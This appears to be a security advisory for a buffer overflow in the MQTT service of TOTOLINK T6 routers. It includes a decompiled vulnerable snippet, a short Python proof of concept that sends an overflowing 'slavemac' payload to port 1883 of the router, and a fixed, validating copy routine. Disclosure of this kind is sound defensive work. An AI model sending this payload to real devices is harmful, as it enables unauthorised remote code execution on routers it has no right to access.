### Key Information

#### Vulnerability Identifier

- **CVE ID**: CVE-2025-7837

#### Affected Scope

- **Vendor**: TOTOLINK
- **Affected Product**: T6
- **Affected Firmware Version**: V4.1.5cu.748_B20211015

#### Vulnerability Overview

- **Vulnerability Type**: Buffer Overflow
- **Affected Service**: MQTT Service
- **Port**: 1883
- **Consequence**: Remote Code Execution (RCE)

#### Vulnerability Details

- **Problematic Function**: `recvSlaveStaInfo`
- **Description**: The `strcpy` function is used without checking the input length, leading to a buffer overflow when processing input data.
- **Critical Code Snippet**:

```c
char dest[4]; // [sp+0h] [bp-10h] BYREF
int v9; // [sp+4h] [bp-Ch]
int v10; // [sp+8h] [bp-8h]
int v11; // [sp+Ch] [bp-4h]

v4 = dest;
strcpy(dest, Var);
```

#### POC (Proof of Concept)

- **Python Code Example**:

```python
import paho.mqtt.client as mqtt

payload = b"A" * 36 + b"\x37\x33\x39\x33"
client = mqtt.Client()
client.connect("192.168.8.1", 1883, 60)
client.publish("/totolink/router/recvSlaveStaInfo", b'{"slavemac":"%s"}' % payload)
```
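For contrast with the unchecked `strcpy(dest, Var)` shown under Vulnerability Details, the following added example (not the vendor's code and not part of the original advisory) validates the value before copying it into a buffer of known size. It assumes the `slavemac` field is meant to hold a 17-character colon-separated MAC address; `is_valid_mac` and `copy_slave_mac` are hypothetical names.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

#define MAC_STR_LEN 17 /* "aa:bb:cc:dd:ee:ff", terminator not counted (assumed format) */

/* Hypothetical helper: returns 1 only for a well-formed, exactly 17-character MAC.
 * The loop stops at the first bad byte, so it never reads past the terminator. */
static int is_valid_mac(const char *s)
{
    if (s == NULL)
        return 0;
    for (size_t i = 0; i < MAC_STR_LEN; i++) {
        if (i % 3 == 2) {
            if (s[i] != ':')
                return 0;
        } else if (!isxdigit((unsigned char)s[i])) {
            return 0;
        }
    }
    return s[MAC_STR_LEN] == '\0'; /* reject anything longer */
}

/*
 * Hypothetical replacement for the unchecked strcpy(dest, Var):
 * copies only when the input is valid and the destination can hold it.
 * Returns 0 on success, -1 when the input is rejected (dest is left empty).
 */
int copy_slave_mac(char *dest, size_t dest_size, const char *var)
{
    if (dest == NULL || dest_size == 0)
        return -1;
    dest[0] = '\0';
    if (dest_size < MAC_STR_LEN + 1 || !is_valid_mac(var))
        return -1;
    memcpy(dest, var, MAC_STR_LEN + 1); /* length is fixed and already verified */
    return 0;
}
```

A 4-byte destination like the one in the decompiled snippet is rejected outright by the size check, and an oversized value such as the one in the PoC fails validation before any copy takes place.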